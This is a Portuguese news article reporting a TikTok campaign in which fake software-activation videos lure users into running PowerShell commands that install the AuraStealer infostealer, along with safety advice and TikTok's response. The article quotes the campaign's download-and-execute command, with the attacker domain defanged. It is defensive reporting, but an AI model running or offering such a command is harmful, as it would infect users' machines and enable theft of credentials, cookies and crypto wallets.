As plataformas de redes sociais, além de servirem como meios de entretenimento e comunicação, têm-se tornado ferramentas eficazes para a disseminação de ameaças à segurança digital.
Em maio, a Trend Micro divulgou um relatório que alertava para uma série de vídeos no TikTok utilizados como parte de uma campanha maliciosa que espalhava info-stealers, malwares capazes de roubar dados pessoais, logins de redes sociais, criptomoedas e outras informações sensíveis.
Na altura, o TikTok afirmou ter removido todas as contas mencionadas no relatório. No entanto, segundo o portal Bleeping Computer, novas contas estão a surgir para divulgar falsas chaves de ativação de softwares legítimos como Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro, bem como assinaturas falsas de serviços como Netflix e Spotify Premium. Esta campanha cibercriminosa faz parte dos ataques cibernéticos apelidados de ClickFix.
Os vídeos explicam como o utilizador pode executar um comando via PowerShell para obter programas e serviços de forma gratuita. Contudo, trata-se de uma técnica de engenharia social, na qual os vídeos persuasivos convencem o público a seguir instruções que acabam por resultar na infeção dos seus computadores.
As publicações pedem que os utilizadores executem códigos como administradores do PowerShell, como este:
iex (irm slmgr[.]win/photoshop)
De acordo com o Bleeping Computer, este comando direciona para o site slmgr[.]win, responsável por descarregar e executar o código malicioso no dispositivo da vítima.
O malware identificado neste processo foi analisado através do VirusTotal e classificado como uma variante do AuraStealer, um infostealer capaz de recolher e enviar aos criminosos credenciais de navegadores e aplicações, cookies e carteiras de criptomoedas.
Até ao momento da publicação desta matéria, verificamos que a conta do TikTok responsável pela divulgação dos códigos maliciosos ainda se encontra ativa.
Evita dores de cabeça: usa apenas software legítimo
A principal recomendação para não cair neste tipo de golpe é evitar recorrer a métodos de pirataria. Embora a internet esteja cheia de “truques” para ativar produtos e serviços premium, há sempre o risco de te tornares alvo de um ataque que pode roubar informações confidenciais.
Vídeos que pedem para copiar e executar códigos no PowerShell não devem ser seguidos sob nenhuma circunstância.
Mesmo que certas aplicações ou sistemas sejam caros, é sempre mais seguro obtê-los de forma legítima.
Procura promoções, cupons e planos familiares (que costumam ter bons descontos), ou opções de assinaturas anuais.
Caso tenhas sido vítima desta campanha maliciosa ou de outro ataque semelhante, redefine imediatamente as tuas palavras-passe em sites e aplicações sensíveis — como e-mail, contas bancárias, redes sociais e carteiras digitais.
Atualização: TikTok remove as contas que promoviam o malware
Em resposta ao 4gnews, o TikTok afirmou que as contas mencionadas no relatório foram removidas. A empresa destacou ainda que a infeção dos dispositivos não ocorre diretamente na sua plataforma, uma vez que, para que o malware afetasse os utilizadores, seria necessário que estes realizassem outras ações fora da rede social.
"Publicamos regularmente recursos educativos para ajudar a comunidade TikTok a adotar as melhores práticas de segurança, incluindo como identificar potenciais esquemas fraudulentos na plataforma. Seguem alguns exemplos recentes para referência:
- Centro de Privacidade do TikTok | Como combatemos fraudes e esquemas no TikTok
- Centro de Apoio do TikTok | Evitar phishing no TikTok
- Centro de Segurança do TikTok | Privacidade e segurança no TikTok"
- TikTok.
